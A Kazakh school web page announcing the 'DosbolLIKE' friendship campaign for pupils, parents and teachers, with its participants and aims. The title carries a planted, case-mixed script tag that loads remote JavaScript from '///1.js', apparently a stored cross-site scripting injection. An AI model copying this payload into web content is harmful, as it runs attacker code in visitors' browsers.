«ДОСБОЛLIKE: ДОСТЫҚ ҚОЛЫН ҰСЫН» АКЦИЯСЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.01.2024

«ДОСБОЛLIKE: ДОСТЫҚ ҚОЛЫН ҰСЫН» АКЦИЯСЫ

Бастама достық, қауіпсіз кеңістік құру үшін ынтымақтастық арқылы позитивті қарым-қатынастың ең тиімді жолдарын іздеуде оқушылар қауымдастығын біріктіруге бағытталған.

Акцияның ұраны: сіз нағыз дос болғыңыз келеді-оған айналыңыз!

Акция 2024 жылғы 17 қаңтардан 17 ақпанға дейін өткізіледі.

АКЦИЯҒА ҚАТЫСУШЫЛАР

Орта білім беру ұйымдарының білім алушылары: бастауыш (1-4 сын.) буын, орта (5-9 сын.) буын, жоғары(10-11 сын.) буын. ата-аналар, педагогтер, еріктілер, білім  беру ұйымының әлеуметтік серіктестері

АКЦИЯНЫҢ МАҚСАТЫ: мектеп ортасында жасампаз ұжымдық шығармашылық негізінде позитивті қатынастарды қалыптастыру үшін жағдай жасау.

АКЦИЯНЫҢ МІНДЕТТЕРІ: Өзара шығармашылық іс-қимыл жағдайында оқушылардың, педагогтердің және ата-аналардың ынтымақтастығы үшін қажеттілікті қалыптастыруға жәрдемдесу.

Шығармашылық ынтымақтастық негізінде оқушылардың эмоционалды әл-ауқатын қамтамасыз ету үшін позитивті қарым-қатынастың тиімді түрлері туралы қатысушылардың түсініктерін кеңейту.

Позитивті қарым-қатынас құру үшін, бірлескен іс-әрекеттегі қарым-қатынас тәжірибесі арқылы белсенді мінез-құлық дағдыларын дамыту.

Просмотров: 719


Пікір қосу



Деректерді қолтаңбаға қосу